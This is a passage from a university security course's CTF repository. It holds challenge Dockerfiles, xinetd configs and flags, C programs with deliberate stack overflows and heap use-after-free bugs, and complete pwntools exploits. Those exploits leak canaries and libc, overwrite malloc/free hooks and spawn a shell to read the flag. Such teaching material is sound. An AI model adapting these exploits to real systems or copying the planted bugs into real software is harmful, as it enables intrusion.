/week2/ret2plt/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m ret2plt 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/ret2plt 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week2/ret2plt/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{ret2222222222222222222p1t} 2 | -------------------------------------------------------------------------------- /week2/ret2plt/share/ret2plt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/ret2plt/share/ret2plt -------------------------------------------------------------------------------- /week2/ret2plt/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/ret2plt/ret2plt 5 | -------------------------------------------------------------------------------- /week2/ret2plt/xinetd: -------------------------------------------------------------------------------- 1 | service ret2plt 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ret2plt/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ret2plt 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week2/rop/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m rop 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/rop 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week2/rop/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{ROo0o0o0o0o0o0o0o00P} 2 | -------------------------------------------------------------------------------- /week2/rop/share/rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/rop/share/rop -------------------------------------------------------------------------------- /week2/rop/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/rop/rop 5 | -------------------------------------------------------------------------------- /week2/rop/xinetd: -------------------------------------------------------------------------------- 1 | service rop 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/rop/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = rop 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week2/src/casino++.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | int lottery[6] = {0}, guess[6] = {0}; 7 | char name[0x10] = {0}; 8 | int age, seed; 9 | 10 | void init(){ 11 | setvbuf(stdout,0,2,0); 12 | setvbuf(stdin,0,2,0); 13 | setvbuf(stderr,0,2,0); 14 | seed = time(0); 15 | } 16 | 17 | int read_int(){ 18 | char buf[0x10]; 19 | __read_chk( 0 , buf , 0xf , 0x10 ); 20 | return atoi( buf ); 21 | } 22 | 23 | void welcome(){ 24 | puts( "+--------------------+" ); 25 | puts( "| Casino |" ); 26 | puts( "+--------------------+" ); 27 | puts( "" ); 28 | } 29 | 30 | 31 | void casino(){ 32 | 33 | srand( seed ); 34 | for( int i = 0 ; i < 6 ; ++i ) lottery[i] = rand() % 100; 35 | 36 | int try = 2, idx; 37 | 38 | while( try-- ){ 39 | printf( "\n$$$$$$$ Lottery $$$$$$$\n " ); 40 | 41 | for( int i = 0 ; i < 6 ; ++i ){ 42 | printf( "Chose the number %d: " , i ); 43 | guess[i] = read_int(); 44 | } 45 | 46 | printf( "Change the number? [1:yes 0:no]: " ); 47 | if( read_int() == 1 ){ 48 | printf( "Which number [1 ~ 6]: " ); 49 | idx = read_int() - 1; 50 | printf( "Chose the number %d: " , idx ); 51 | guess[idx] = read_int(); 52 | } 53 | 54 | for( int i = 0 ; i < 6 ; ++i ){ 55 | if( guess[i] != lottery[i] ) break; 56 | if( i == 5 ){ 57 | puts( "You win! Hacker don't need luck :P" ); 58 | } 59 | } 60 | } 61 | 62 | printf( "You lose.\nBye~\n " ); 63 | } 64 | 65 | 66 | int main(){ 67 | 68 | init(); 69 | welcome(); 70 | 71 | puts( "Show me your passport." ); 72 | printf( "Your name: " ); 73 | read( 0 , name , 0x100 ); // Oops 74 | 75 | printf( "Your age: " ); 76 | age = read_int(); 77 | 78 | if( age < 20 ){ 79 | puts( "You can not enter the casino!" ); 80 | } 81 | else{ 82 | casino(); 83 | } 84 | 85 | return 0; 86 | } -------------------------------------------------------------------------------- /week2/src/ret2libc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void init(){ 5 | setvbuf(stdout,0,2,0); 6 | setvbuf(stdin,0,2,0); 7 | setvbuf(stderr,0,2,0); 8 | } 9 | 10 | int main(){ 11 | 12 | init(); 13 | 14 | puts( "Say hello to stack :D" ); 15 | 16 | char buf[0x30]; 17 | gets( buf ); 18 | 19 | return 0; 20 | } -------------------------------------------------------------------------------- /week2/src/ret2plt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void init(){ 5 | setvbuf(stdout,0,2,0); 6 | setvbuf(stdin,0,2,0); 7 | setvbuf(stderr,0,2,0); 8 | } 9 | 10 | int main(){ 11 | 12 | init(); 13 | 14 | system( "echo 'Say hello to stack :D'" ); 15 | 16 | char buf[0x30]; 17 | gets( buf ); 18 | 19 | return 0; 20 | } -------------------------------------------------------------------------------- /week2/src/rop.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void init(){ 5 | setvbuf(stdout,0,2,0); 6 | setvbuf(stdin,0,2,0); 7 | setvbuf(stderr,0,2,0); 8 | } 9 | 10 | int main(){ 11 | 12 | init(); 13 | 14 | puts( "Say hello to stack :D" ); 15 | 16 | char buf[0x30]; 17 | gets( buf ); 18 | 19 | return 0; 20 | } -------------------------------------------------------------------------------- /week3/Makefile: -------------------------------------------------------------------------------- 1 | all: src/uaf.c src/note.c src/t-note.c src/election.c src/note++.c 2 | gcc src/uaf.c -o ./uaf/share/uaf 3 | gcc src/note.c -o ./note/share/note 4 | gcc src/t-note.c -o ./t-note/share/t-note 5 | gcc src/election.c -o ./election/share/election 6 | gcc src/note++.c -o ./note++/share/note++ 7 | 8 | clean: 9 | rm uaf/share/uaf note/share/note t-note/share/t-note election/share/election note++/share/note++ -------------------------------------------------------------------------------- /week3/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | uaf: 4 | build: ./uaf/ 5 | volumes: 6 | - ./uaf/share:/home/uaf:ro 7 | - ./uaf/xinetd:/etc/xinetd.d/uaf:ro 8 | - ./tmp:/tmp:ro 9 | ports: 10 | - "10177:4597" 11 | note: 12 | build: ./note/ 13 | volumes: 14 | - ./note/share:/home/note:ro 15 | - ./note/xinetd:/etc/xinetd.d/note:ro 16 | - ./tmp:/tmp:ro 17 | ports: 18 | - "10178:4597" 19 | t-note: 20 | build: ./t-note/ 21 | volumes: 22 | - ./t-note/share:/home/t-note:ro 23 | - ./t-note/xinetd:/etc/xinetd.d/t-note:ro 24 | - ./tmp:/tmp:ro 25 | ports: 26 | - "10179:4597" 27 | election: 28 | build: ./election/ 29 | volumes: 30 | - ./election/share:/home/election:ro 31 | - ./election/xinetd:/etc/xinetd.d/election:ro 32 | - ./tmp:/tmp:ro 33 | ports: 34 | - "10180:4597" 35 | note_pro: 36 | build: ./note++/ 37 | volumes: 38 | - ./note++/share:/home/note++:ro 39 | - ./note++/xinetd:/etc/xinetd.d/note++:ro 40 | - ./tmp:/tmp:ro 41 | ports: 42 | - "10181:4597" 43 | -------------------------------------------------------------------------------- /week3/election/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m election 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/election 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week3/election/share/election: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/election/share/election -------------------------------------------------------------------------------- /week3/election/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Wh0_h4cked_my_v0t1ng_sys7em_:P} 2 | -------------------------------------------------------------------------------- /week3/election/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 180 /home/election/election 5 | -------------------------------------------------------------------------------- /week3/election/xinetd: -------------------------------------------------------------------------------- 1 | service election 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/election/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = election 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week3/exp/election.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | e , l = ELF( '../election/share/election' ) , ELF( './libc-2.27.so' ) 7 | 8 | y = remote( 'localhost' , 10180 ) 9 | #y = remote( 'edu-ctf.csie.org' , 10180 ) 10 | #y = process( '../election/share/election' ) 11 | #pause() 12 | 13 | def login( tok ): 14 | y.sendafter( '>' , '1' ) 15 | y.sendafter( ':' , tok ) 16 | 17 | def reg( tok ): 18 | y.sendafter( '>' , '2' ) 19 | y.sendafter( ':' , tok ) 20 | 21 | def logout(): 22 | y.sendafter( '>' , '3' ) 23 | 24 | def vote( idx ): 25 | y.sendafter( '>' , '1' ) 26 | y.sendafter( ':' , str( idx ) ) 27 | 28 | def say( idx , data ): 29 | y.sendafter( '>' , '2' ) 30 | y.sendafter( ':' , str( idx ) ) 31 | y.sendafter( 'Message: ' , data ) 32 | 33 | 34 | reg( 'a' * 0xb8 ) 35 | 36 | tok = 'a' * 0xb8 37 | canary = '\0' 38 | 39 | 40 | for i in range( 7 ): 41 | print i 42 | for c in map( chr , range( 0xff , -1 , -1 ) ): 43 | login( tok + canary + c ) 44 | o = y.recvline() 45 | if 'Invalid token' not in o: 46 | canary += c 47 | info( hex( u64( canary.ljust( 8 , '\0' ) ) ) ) 48 | logout() 49 | break 50 | 51 | 52 | success( 'cananry -> %s' % hex( u64( canary ) ) ) 53 | 54 | pie = '' 55 | 56 | for i in range( 6 ): 57 | print i 58 | for c in map( chr , range( 0xff , -1 , -1 ) ): 59 | login( tok + canary + pie + c ) 60 | o = y.recvline() 61 | if 'Invalid token' not in o: 62 | pie += c 63 | info( hex( u64( pie.ljust( 8 , '\0' ) ) ) ) 64 | logout() 65 | break 66 | 67 | pie = u64( pie.ljust( 8 , '\0' ) ) - 0x1140 68 | e.address = pie 69 | 70 | success( 'pie -> %s' % hex( pie ) ) 71 | 72 | for i in range( 25 ): 73 | print i 74 | reg( 'a' ) 75 | login( 'a' ) 76 | for j in range(10): 77 | vote( 1 ) 78 | logout() 79 | 80 | reg( 'a' ) 81 | login( 'a' ) 82 | for j in range(5): 83 | vote( 1 ) 84 | logout() 85 | 86 | 87 | buf = pie + 0x202160 88 | 89 | leave_ret = pie + 0xbe9 90 | pop_rdi = pie + 0x11a3 91 | 92 | csu = pie + 0x1180 93 | ppppppr = pie + 0x119a # pop rbx; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 94 | 95 | p = flat( 96 | 0, 97 | pop_rdi, 98 | e.got.__libc_start_main, 99 | e.plt.puts, 100 | ppppppr, 101 | 0, 1, buf + 0xa0, 0, buf + 0xa0 - 8, 0x100, 102 | csu, 103 | 0, 0, 0, 0, 0, 0, 0, 104 | 0x7777777, 105 | e.plt.read 106 | ) 107 | login( p ) 108 | 109 | login( 'a' ) 110 | 111 | p = flat( 112 | 'a' * 0xe8, 113 | canary, 114 | buf, 115 | leave_ret 116 | ) 117 | say( 1 , p[:-1] ) 118 | 119 | logout() 120 | y.recvline() 121 | l.address = u64( y.recv(6) + '\0\0' ) - l.sym.__libc_start_main 122 | success( 'libc -> %s' % hex( l.address ) ) 123 | 124 | one = 0x10a38c 125 | y.send( p64( l.address + one ) ) 126 | 127 | sleep( 0.3 ) 128 | y.sendline( 'cat /home/`whoami`/flag' ) 129 | 130 | y.interactive() 131 | 132 | 133 | -------------------------------------------------------------------------------- /week3/exp/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/exp/libc-2.23.so -------------------------------------------------------------------------------- /week3/exp/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/exp/libc-2.27.so -------------------------------------------------------------------------------- /week3/exp/note++.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | l = ELF( 'libc-2.23.so' ) 6 | 7 | y = remote( 'localhost' , 10181 ) 8 | #y = remote( 'edu-ctf.csie.org' , 10181 ) 9 | #y = process( '../note++/share/note++' ) 10 | #pause() 11 | 12 | 13 | def add( size , note , desc ): 14 | y.sendafter( '>' , '1' ) 15 | y.sendafter( 'Size: ' , str( size ) ) 16 | y.sendafter( 'Note: ' , note ) 17 | y.sendlineafter( ': ' , desc ) 18 | 19 | def lis(): 20 | y.sendafter( '>' , '2' ) 21 | #y.sendafter( 'Index: ' , str( index ) ) 22 | 23 | def dle( index ): 24 | y.sendafter( '>' , '3' ) 25 | y.sendafter( 'Index: ' , str( index ) ) 26 | 27 | 28 | 29 | add( 0x68 , 'a' , 'A' ) 30 | add( 0x68 , 'b' , 'B' ) 31 | add( 0x68 , 'c' , 'C' ) 32 | add( 0x68 , flat( '\0' * 0x58 , 0x71 ) , 'D' ) 33 | add( 0x78 , 'a' * 0x78 , 'U' * 0x30 ) 34 | add( 0x78 , 'b' * 0x78 , 'd' ) 35 | add( 0x10 , 'p' , 'p' ) 36 | 37 | dle( 3 ) 38 | dle( 1 ) 39 | dle( 2 ) 40 | dle( 0 ) 41 | 42 | add( 0x68 , 'a' , 'a' * 0x38 ) 43 | 44 | lis() 45 | y.recvuntil( 'Note 1:' ) 46 | y.recvuntil( 'Data: ' ) 47 | heap = u64( y.recv(6) + '\0\0' ) - 0x150 48 | success( 'heap -> %s' % hex( heap ) ) 49 | 50 | dle( 1 ) 51 | 52 | add( 0x68 , p64( heap + 0x1b0 ) , 'a' ) 53 | add( 0x68 , 'a' , 'a' ) 54 | add( 0x68 , 'a' , 'a' ) 55 | 56 | add( 0x68 , flat( 0 , p64( 0x101 ) ) , 'a' ) 57 | 58 | dle( 4 ) 59 | 60 | dle( 3 ) 61 | add( 0x68 , 'a' , 'a' * 0x38 ) 62 | 63 | lis() 64 | y.recvuntil( 'Note 4:' ) 65 | y.recvuntil( 'Data: ' ) 66 | l.address = u64( y.recv(6) + '\0\0' ) - 0x3c4b78 67 | success( 'libc -> %s' % hex( l.address ) ) 68 | 69 | dle(1) 70 | dle(2) 71 | dle(0) 72 | add( 0x68 , 'a' , 'a' * 0x38 ) 73 | 74 | dle(1) 75 | 76 | add( 0x68 , p64( l.sym.__malloc_hook - 0x10 - 3 ) , 'a' ) 77 | add( 0x68 , 'a' , 'a' ) 78 | add( 0x68 , 'a' , 'a' ) 79 | 80 | one = 0xf02a4 81 | 82 | add( 0x68 , 'a' * 3 + p64( l.address + one ) , 'a' ) 83 | 84 | dle(4) 85 | 86 | sleep( 0.3 ) 87 | y.sendline( 'cat /home/`whoami`/flag' ) 88 | 89 | y.interactive() -------------------------------------------------------------------------------- /week3/exp/note.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | l = ELF( 'libc-2.23.so' ) 6 | 7 | y = remote( 'localhost' , 10178 ) 8 | #y = remote( 'edu-ctf.csie.org' , 10178 ) 9 | #y = process( '../note/share/note' ) 10 | #pause() 11 | 12 | 13 | def add( size , note ): 14 | y.sendafter( '>' , '1' ) 15 | y.sendafter( 'Size: ' , str( size ) ) 16 | y.sendafter( 'Note: ' , note ) 17 | 18 | def show( index ): 19 | y.sendafter( '>' , '2' ) 20 | y.sendafter( 'Index: ' , str( index ) ) 21 | 22 | def delete( index ): 23 | y.sendafter( '>' , '3' ) 24 | y.sendafter( 'Index: ' , str( index ) ) 25 | 26 | 27 | add( 0x100 , 'leak' ) # 0 28 | add( 0x68 , 'a' ) # 1 29 | add( 0x68 , 'b' ) # 2 30 | 31 | delete( 0 ) 32 | 33 | show( 0 ) 34 | y.recvline() 35 | l.address = u64( y.recv(6) + '\0\0' ) - 0x3c4b78 36 | success( 'libc -> %s' % hex( l.address ) ) 37 | 38 | 39 | delete( 1 ) 40 | delete( 2 ) 41 | delete( 1 ) 42 | 43 | add( 0x68 , p64( l.sym.__malloc_hook - 0x10 - 3 ) ) 44 | add( 0x68 , 'a' ) 45 | add( 0x68 , 'a' ) 46 | 47 | #add( 0x68 , 'aaa' + p64( 0x66666666 ) ) 48 | 49 | # system 50 | add( 0x68 , 'aaa' + p64( l.sym.system ) ) 51 | y.sendafter( '>' , '1' ) 52 | y.sendafter( 'Size: ' , str( l.search( '/bin/sh' ).next() ) ) 53 | 54 | # one gadget 55 | ''' 56 | add( 0x68 , 'aaa' + p64( l.address + 0xf02a4 ) ) 57 | delete( 0 ) 58 | ''' 59 | 60 | sleep(0.1) 61 | y.sendline( 'cat /home/`whoami`/flag' ) 62 | 63 | y.interactive() 64 | 65 | 66 | -------------------------------------------------------------------------------- /week3/exp/t-note.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | l = ELF( 'libc-2.27.so' ) 6 | 7 | y = remote( 'localhost' , 10179 ) 8 | #y = remote( 'edu-ctf.csie.org' , 10179 ) 9 | #y = process( '../t-note/share/t-note' ) 10 | #pause() 11 | 12 | 13 | def add( size , note ): 14 | y.sendafter( '>' , '1' ) 15 | y.sendafter( 'Size: ' , str( size ) ) 16 | y.sendafter( 'Note: ' , note ) 17 | 18 | def show( index ): 19 | y.sendafter( '>' , '2' ) 20 | y.sendafter( 'Index: ' , str( index ) ) 21 | 22 | def delete( index ): 23 | y.sendafter( '>' , '3' ) 24 | y.sendafter( 'Index: ' , str( index ) ) 25 | 26 | 27 | add( 0x410 , 'leak' ) # 0 28 | add( 0x20 , 'a' ) # 1 29 | 30 | delete( 0 ) 31 | 32 | show( 0 ) 33 | y.recvline() 34 | l.address = u64( y.recv(6) + '\0\0' ) - 0x3ebca0 35 | success( 'libc -> %s' % hex( l.address ) ) 36 | 37 | delete( 1 ) 38 | delete( 1 ) 39 | 40 | add( 0x20 , p64( l.sym.__free_hook ) ) 41 | add( 0x20 , 'a' ) 42 | add( 0x20 , p64( l.address + 0x4f322 ) ) 43 | 44 | delete( 0 ) 45 | 46 | sleep(0.1) 47 | y.sendline( 'cat /home/`whoami`/flag' ) 48 | 49 | y.interactive() -------------------------------------------------------------------------------- /week3/exp/uaf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | y = remote( 'localhost' , 10177 ) 7 | #y = remote( 'edu-ctf.csie.org' , 10177 ) 8 | #y = process( '../uaf/share/uaf' ) 9 | #pause() 10 | 11 | y.sendafter( 'Size of your message: ' , str( 0x10 ) ) 12 | y.sendafter( 'Message:' , 'a' * 8 ) 13 | 14 | y.recvuntil( 'a' * 8 ) 15 | 16 | pie = u64( y.recv(6) + '\0\0' ) - 0xa77 17 | success( 'PIE - > %s' % hex( pie ) ) 18 | 19 | y.sendafter( 'Size of your message: ' , str( 0x10 ) ) 20 | y.sendafter( 'Message:' , 'a' * 8 + p64( pie + 0xab5 ) ) 21 | 22 | y.sendafter( 'Size of your message: ' , str( 0x100 ) ) 23 | y.sendafter( 'Message:' , 'a' * 8 ) 24 | 25 | sleep(0.1) 26 | y.sendline( 'cat /home/`whoami`/flag' ) 27 | 28 | y.interactive() -------------------------------------------------------------------------------- /week3/note++/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m note++ 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/note++ 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week3/note++/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Heap_exp1oit4ti0n_15_fun} 2 | -------------------------------------------------------------------------------- /week3/note++/share/note++: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/note++/share/note++ -------------------------------------------------------------------------------- /week3/note++/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/note++/note++ 5 | -------------------------------------------------------------------------------- /week3/note++/xinetd: -------------------------------------------------------------------------------- 1 | service note++ 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/note++/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = note++ 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week3/note/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m note 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/note 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week3/note/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Pwned_7he_f1rst_b1nary_w17h0ut_0verf1ow} 2 | -------------------------------------------------------------------------------- /week3/note/share/note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/note/share/note -------------------------------------------------------------------------------- /week3/note/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/note/note 5 | -------------------------------------------------------------------------------- /week3/note/xinetd: -------------------------------------------------------------------------------- 1 | service note 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/note/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = note 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week3/src/election.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #define TIMEOUT 180 9 | #define candidates_num 10 10 | 11 | 12 | struct Candidate{ 13 | char *name; 14 | uint8_t votes; 15 | } candidates[candidates_num]; 16 | 17 | int vote = 0; 18 | char buf[0xc8]; 19 | 20 | char* candidates_name[candidates_num] = { 21 | "Pusheen", 22 | "Angelboy", 23 | "Chinese Tsai", 24 | "Korean Cat", 25 | "Trump", 26 | "Nini ", 27 | "how2vote", 28 | "Rilakkuma", 29 | "John Cena", 30 | "Capoo" 31 | }; 32 | 33 | 34 | void handler( int signum ){ 35 | uint8_t max; 36 | for( int i = 0 ; i < candidates_num ; ++i ) max = candidates[i].votes > max ? candidates[i].votes : max; 37 | for( int i = 0 ; i < candidates_num ; ++i ){ 38 | if( candidates[i].votes == max ){ 39 | printf( "Congrat to %s !!!\n" , candidates[i].name ); 40 | break; 41 | } 42 | } 43 | _exit(1); 44 | } 45 | 46 | int read_int(){ 47 | char buf[0x10]; 48 | __read_chk( 0 , buf , 0xf , 0x10 ); 49 | return atoi( buf ); 50 | } 51 | 52 | 53 | void init(){ 54 | setvbuf(stdout,0,2,0); 55 | setvbuf(stdin,0,2,0); 56 | setvbuf(stderr,0,2,0); 57 | signal( SIGALRM , handler ); 58 | alarm( TIMEOUT ); 59 | } 60 | 61 | 62 | void banner(){ 63 | puts( "+-------------------------------------------+" ); 64 | puts( "| EDU 2019 Election Voting System v1.0 |" ); 65 | puts( "+-------------------------------------------+" ); 66 | } 67 | 68 | void welcome(){ 69 | banner(); 70 | puts( "1. Login" ); 71 | puts( "2. Register" ); 72 | puts( "3. Exit" ); 73 | puts( ">" ); 74 | } 75 | 76 | 77 | void init_candidates(){ 78 | for( int i = 0 ; i < candidates_num ; ++i ){ 79 | candidates[i].name = candidates_name[i]; 80 | candidates[i].votes = 0; 81 | } 82 | } 83 | 84 | 85 | void menu(){ 86 | banner(); 87 | puts( "1. Vote" ); 88 | puts( "2. I want to say something to candidates" ); 89 | puts( "3. Logout" ); 90 | puts( ">" ); 91 | } 92 | 93 | 94 | 95 | void voting(){ 96 | int n , idx; 97 | char msg[0xe0]; 98 | while(1){ 99 | menu(); 100 | n = read_int(); 101 | switch( n ){ 102 | case 1: 103 | if( !vote ){ 104 | puts( "You can not vote anymore :(" ); 105 | break; 106 | } 107 | puts( "Candidates:" ); 108 | for( int i = 0 ; i < candidates_num ; ++i ){ 109 | printf( "%d. %s\tvotes: %u\n" , i , candidates[i].name , candidates[i].votes ); 110 | } 111 | printf( "Your choice [0~9]: " ); 112 | idx = read_int(); 113 | if( idx < 0 || idx >= candidates_num ){ 114 | puts( "Invalid choice." ); 115 | break; 116 | } 117 | candidates[idx].votes += 1; 118 | vote -= 1; 119 | printf( "Done!\n%s: Thank you!\n" , candidates[idx].name ); 120 | break; 121 | 122 | case 2: 123 | puts( "The more votes candidate has, the more message you can say!" ); 124 | printf( "To [0~9]: " ); 125 | idx = read_int(); 126 | if( idx < 0 || idx >= candidates_num ){ 127 | puts( "Invalid choice." ); 128 | break; 129 | } 130 | printf( "To %s:\nMessage: " , candidates[idx].name ); 131 | read( 0 , msg , candidates[idx].votes ); 132 | puts( "Done!" ); 133 | break; 134 | 135 | case 3: 136 | return; 137 | 138 | default: 139 | puts( ":)" ); 140 | break; 141 | } 142 | } 143 | } 144 | 145 | int main(){ 146 | 147 | init(); 148 | 149 | init_candidates(); 150 | 151 | char token[0xb8] = {0}; 152 | 153 | while(1){ 154 | welcome(); 155 | int n = read_int(); 156 | 157 | switch( n ){ 158 | case 1: 159 | printf( "Token: " ); 160 | int len = read( 0 , buf , sizeof( buf ) ); 161 | 162 | if( memcmp( buf , token , len ) ){ 163 | puts( "Invalid token." ); 164 | break; 165 | } 166 | 167 | voting(); 168 | break; 169 | case 2: 170 | printf( "Register an anonymous token: " ); 171 | read( 0 , token , sizeof( token ) ); 172 | 173 | vote = 10; 174 | puts( "Done!" ); 175 | break; 176 | case 3: 177 | handler(0); 178 | break; 179 | default: 180 | puts( ":)" ); 181 | break; 182 | } 183 | } 184 | return 0; 185 | } -------------------------------------------------------------------------------- /week3/src/note++.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #define MAX 10 6 | 7 | 8 | void init(){ 9 | setvbuf(stdout,0,2,0); 10 | setvbuf(stdin,0,2,0); 11 | setvbuf(stderr,0,2,0); 12 | } 13 | 14 | 15 | int read_int(){ 16 | char buf[0x10]; 17 | __read_chk( 0 , buf , 0xf , 0x10 ); 18 | return atoi( buf ); 19 | } 20 | 21 | int read_input( char *buf , unsigned int size ){ 22 | int ret = __read_chk( 0 , buf , size , size ); 23 | if(ret <= 0){ 24 | puts("read error"); 25 | _exit(1); 26 | } 27 | if(buf[ret-1] == '\n'){ 28 | buf[ret-1] = '\0'; 29 | } 30 | return ret; 31 | } 32 | 33 | 34 | struct Note{ 35 | int is_freed; 36 | char *data; 37 | char description[48]; 38 | }; 39 | 40 | struct Note notes[MAX]; 41 | 42 | void add(){ 43 | for( int i = 0 ; i < MAX ; ++i ){ 44 | if( !notes[i].data || notes[i].is_freed ){ 45 | 46 | printf( "Size: " ); 47 | unsigned int size = read_int(); 48 | 49 | if( size > 0x78 ){ 50 | puts( "Too big!" ); 51 | return; 52 | } 53 | 54 | notes[i].data = malloc( size ); 55 | memset( notes[i].data , 0 , size ); // no information leak 56 | 57 | printf( "Note: " ); 58 | read_input( notes[i].data , size - 1 ); 59 | 60 | printf( "Description of this note: " ); 61 | 62 | // fixed overflow 63 | // scanf( "%s" , notes[i].description ) // overflow 64 | scanf( "%48s" , notes[i].description ); // safe 65 | 66 | notes[i].is_freed = 0; 67 | 68 | puts( "Done!" ); 69 | return; 70 | } 71 | } 72 | puts( 